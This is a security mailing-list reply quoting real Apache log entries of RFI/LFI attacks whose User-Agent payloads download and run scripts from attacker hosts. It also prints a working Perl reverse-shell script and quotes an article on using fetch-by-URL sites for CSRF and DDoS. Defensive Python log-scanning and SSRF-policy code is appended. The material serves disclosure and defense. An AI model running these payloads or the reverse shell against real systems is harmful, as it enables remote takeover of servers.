I have been witnessing such attacks in the past few weeks. Most of the URLs are trying to exploit components of web software that I do not have installed. Some do GET existing pages such as index.php and tag the attack on the end. Such attacks began about 2 weeks ago.

These attacks have so far come from three different IP addresses, and I was getting around a dozen such accesses every other day. I think my server is pretty secure, but I am a novice, so what do I really know? And as such I have blocked these IPs from accessing my server. FYI, the originating IPs all have WordPress blogs on them.
If anyone is interested, here is one such attack:

<apache2 log entry>
88.181.49.182 - - [28/Jun/2010:19:54:35 +0100] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://212.154.190.140/back.txt?? HTTP/1.1" 404 220 "-" "<?system('cd /var/tmp;wget http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;wget http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80');?>;<?exec_shell('cd /var/tmp;wget http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;wget http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80');?>;<?passthru('cd /var/tmp;wget http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;wget http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80');?> ; Ustupid MF is Back ; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Here is another example:

94.199.181.165 - - [21/Jun/2010:05:36:27 +0100] "GET /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3775 "-" "<?system('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80');?> ;<?exec_shell('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80');?> ;<?passthru('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80');?>;Ustupid MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
</apache2 log entries>

<cb.txt content>
#!/usr/bin/perl
use Socket;
$cmd = "lynx";                        # name the process will show in ps ($0 is overwritten below)
$system = 'echo "`uname -a`";echo "`id`";HISTFILE=/dev/null /bin/sh -i';   # run once connected: fingerprint, then an interactive shell with no history file
$0 = $cmd;
$target = $ARGV[0];                   # connect-back host (192.24.5.30 in the log entries above)
$port = $ARGV[1];                     # connect-back port (80)
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");              # tie the shell's stdin, stdout and stderr to the outbound socket
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
</cb.txt content>

If anyone would like more log entries, let me know. If all this is beneath you guys... sorry I bothered you.

regards
Dave

On 28/06/2010 21:13, MustLive wrote:
> Hello participants of Full-Disclosure!
>
> For the last two months I didn't post my articles to this list due to some not
> serious moaning in April about some of my articles (you can always find my
> articles at my site and in the WASC Mailing List). But at the end of June I
> decided to remind you about my latest articles.
>
> Recently I wrote a new article, Using of the sites for attacks on other sites
> (http://websecurity.com.ua/4322/). This is a brief English version of it.
>
> Last year in the article DoS attacks via Abuse of Functionality vulnerabilities
> (it was mentioned at
> http://jeremiahgrossman.blogspot.com/2010/01/top-ten-web-hacking-techniques-of-2009.html)
> I told about the possibility of conducting DoS attacks via Abuse of
> Functionality vulnerabilities at other sites. In particular I showed examples
> of such vulnerabilities at the web sites regex.info and www.slideshare.net.
> These attacks can be either unidirectional DoS or bidirectional DoS, depending
> on the capacities of both servers.
>
> And now I'll tell you about the possibility of conducting CSRF attacks on
> other sites via Abuse of Functionality vulnerabilities. I began researching such
> attacks already in 2007, when I found such a vulnerability at regex.info.
>
> Using of Abuse of Functionality for attacks on other sites.
>
> Sites which allow making requests to other web sites (to arbitrary web
> pages) have an Abuse of Functionality vulnerability and can be used for
> conducting CSRF attacks on other sites, including DoS attacks via Abuse
> of Functionality, as mentioned above. CSRF attacks can be made only
> against those pages which don't require authorization.
>
> For these attacks it's possible to use both Abuse of Functionality
> vulnerabilities (similar to those mentioned in this article) and Remote File
> Include vulnerabilities (like in PHP applications) - that is Abuse of
> Functionality via RFI.
>
> This attack method can be of use when it's needed to conduct an invisible CSRF
> attack on another site (to not show yourself), for conducting DoS and DDoS
> attacks and for conducting other attacks, particularly for making
> different actions which need to be made from different IPs. For example, in
> online voting, for turning hit counters and advertising hits at the
> site, and also for turning clicks (click fraud).
>
> Abuse of Functionality:
>
> The attack goes as a request from one site (http://site) to another
> (http://another_site) using the appropriate function of the site
> (http://site/script).
>
> http://site/script?url=http://another_site
>
> Advantages of this attack method.
>
> In this part of the article I wrote a list of advantages of this attack
> method. And I mentioned another two important paragraphs:
>
> Note that this DoS attack is possible to use for attacks on redirectors,
> which I wrote about in my articles Redirector's hell and Hellfire for
> redirectors.
>
> Also when conducting DoS attacks it's possible to use several such servers
> at once and so to conduct a DDoS attack. In such a case these servers will
> appear as zombie computers. I.e. the botnet will be made not from home
> computers, but from web servers (which can have larger capacities and faster
> connections). So these vulnerabilities can lead to the appearance of a new class
> of botnets (with zombie servers).
>
> Examples of vulnerable web sites and web services.
>
> In this part of the article I showed examples of different web sites and web
> services which could be used for conducting attacks on other sites,
> including regex.info, www.slideshare.net, anonymouse.org, www.google.com,
> translate.google.com, babelfish.altavista.com, babelfish.yahoo.com,
> keepvid.com, the web application Firebook, the W3C validators and iGoogle.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-- 
Mankind's systems are white sticks tapping walls.
Thanks
Roy
http://www.propergander.org.uk
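Both of Dave's log entries have the same shape: the request line carries the include (a remote URL in mosConfig.absolute.path in the first, a directory-traversal to /proc/self/environ in the second, which works because the process environment contains HTTP_USER_AGENT) and the User-Agent carries the PHP that downloads and runs cb.txt. The script below is an added example, not code from the original post, that flags those indicators in Apache combined-format log lines. The sample lines are constructed (the thread's two entries with the repeated wget/curl payload cut down, plus an ordinary request for contrast); the indicator names and regexes are my own choices.

```python
"""Flag RFI / LFI-via-/proc/self/environ requests that carry PHP in the User-Agent.

Added example, not code from the original post.  Sample log lines are
constructed; indicator names and patterns are assumptions about what to flag."""
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format:
#   host ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# PHP open tag, optionally followed directly by a command-execution function.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|\s|system|exec|shell_exec|passthru)", re.I)
# Fetch-then-run fragment seen in the payload: wget/curl ... ; perl | chmod +x | ./file
DROPPER_RE = re.compile(r"(?:wget|curl)\s.*?;\s*(?:perl\s|chmod \+x|\./)", re.S)
# Traversal to /proc/self/environ (the web server's environment, which holds HTTP_USER_AGENT).
PROC_ENV_RE = re.compile(r"(?:\.\./)+proc/self/environ", re.I)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def classify(line: str) -> list:
    """Return the indicators found in one log line; an empty list means nothing matched."""
    rec = parse_line(line)
    if rec is None:
        return ["unparseable"]
    hits = []
    target = unquote(rec["target"])
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    # RFI: a parameter whose value is itself a URL (mosConfig.absolute.path=http://...).
    if any(v.lower().startswith(REMOTE_SCHEMES) for _, v in params):
        hits.append("rfi_url_in_param")
    # LFI: including /proc/self/environ executes whatever PHP the client put in its UA.
    if PROC_ENV_RE.search(target):
        hits.append("lfi_proc_self_environ")
    if PHP_TAG_RE.search(rec["ua"]):
        hits.append("php_code_in_user_agent")
    if DROPPER_RE.search(rec["ua"]):
        hits.append("download_and_execute_in_user_agent")
    return hits


def scan(lines) -> list:
    """Return (host, target, indicators) for every line that raised at least one indicator."""
    out = []
    for line in lines:
        hits = classify(line)
        if hits:
            rec = parse_line(line) or {"host": "?", "target": line[:60]}
            out.append((rec["host"], rec["target"], hits))
    return out


# Constructed sample lines: the first two are the thread's entries with the repeated
# wget/curl payload shortened, the third is an ordinary request for contrast.
SAMPLE_LOGS = [
    '88.181.49.182 - - [28/Jun/2010:19:54:35 +0100] "GET /components/com_virtuemart/'
    'show_image_in_imgtag.php?mosConfig.absolute.path=http://212.154.190.140/back.txt?? HTTP/1.1" '
    '404 220 "-" "<?system(\'cd /var/tmp;wget http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80\');?>;'
    'Ustupid MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '94.199.181.165 - - [21/Jun/2010:05:36:27 +0100] "GET /index.php?_SERVER[ConfigFile]='
    '../../../../../../proc/self/environ HTTP/1.1" 200 3775 "-" '
    '"<?passthru(\'cd /dev/shm;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80\');?>;'
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '203.0.113.5 - - [28/Jun/2010:20:01:02 +0100] "GET /index.php HTTP/1.1" 200 3775 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for host, target, hits in scan(SAMPLE_LOGS):
        print(host, target[:70], hits)
```

Note that the second entry returned 200 with a full-size body, so on that host it is worth checking whether index.php actually honours _SERVER[ConfigFile]; a 404, as in the first entry, just means the Joomla component was not installed.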
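MustLive's http://site/script?url=http://another_site pattern (Abuse of Functionality in his terms, what is now usually called SSRF) is fixed on the fetching site's side by refusing to be a general-purpose proxy. The following is an added example, not code from the article or from any site it names: a destination policy for such a fetch endpoint (scheme, port and host allow-list, plus a check that every address the host resolves to is public, so a rebinding allow-listed name cannot reach an internal or link-local address) and a per-target throttle against the zombie-server DoS use he describes. The allow-list, the fake DNS table with placeholder addresses, and all names here are my own assumptions.

```python
"""Destination policy for a "fetch this URL for me" endpoint
(http://site/script?url=...).  Added example, not from MustLive's article;
allow-list, fake DNS table and names are assumptions made for illustration."""
import ipaddress
from collections import defaultdict, deque
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

# Constructed policy: the only destinations this fetcher may contact.  Without a
# list like this the endpoint is an open proxy anyone can point at any site.
ALLOWED_HOSTS = frozenset({"static.example.com", "feeds.example.net"})
ALLOWED_SCHEMES = frozenset({"http", "https"})
ALLOWED_PORTS = (None, 80, 443)

# Constructed DNS table with placeholder public addresses so the example runs
# offline; a real deployment resolves with socket.getaddrinfo and applies the same test.
FAKE_DNS = {
    "static.example.com": ["1.2.3.4"],
    "feeds.example.net": ["5.6.7.8", "5.6.7.9"],
}


def fake_resolve(host: str) -> List[str]:
    return FAKE_DNS.get(host, [])


def is_public(addr: str) -> bool:
    """True only for globally routable unicast: rejects loopback, RFC 1918,
    link-local (169.254/16, where cloud metadata services sit), multicast, etc."""
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_fetch_target(url: str,
                       resolve: Callable[[str], List[str]] = fake_resolve) -> Tuple[bool, str]:
    """Decide whether the fetcher may request `url`; returns (allowed, reason).
    Cheapest checks first; the address check runs on every record the name
    resolves to, so a rebinding allow-listed name still cannot reach inside."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = (parts.hostname or "").lower()
    if not host:
        return False, "no host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    if host not in ALLOWED_HOSTS:
        return False, "host not on allow-list"
    addrs = resolve(host)
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        if not is_public(addr):
            return False, "resolves to non-public address " + addr
    return True, "ok"


class PerTargetThrottle:
    """Sliding-window cap on fetches per destination host.  Keyed on the target,
    not the requester, so many different clients cannot add up to the
    zombie-server DoS against one site that the article describes."""

    def __init__(self, limit: int, window_s: float):
        self.limit = limit
        self.window = window_s
        self.hits = defaultdict(deque)

    def allow(self, host: str, now: float) -> bool:
        q = self.hits[host]
        while q and now - q[0] >= self.window:   # drop timestamps outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


if __name__ == "__main__":
    for u in ("http://static.example.com/logo.png", "http://evil.example.org/",
              "http://static.example.com:8080/", "ftp://feeds.example.net/x"):
        print(u, check_fetch_target(u))
```

The throttle is deliberately keyed on the destination: per-requester limits do nothing against an attacker spreading requests over many source addresses, which is exactly the multi-server scenario in the quoted message.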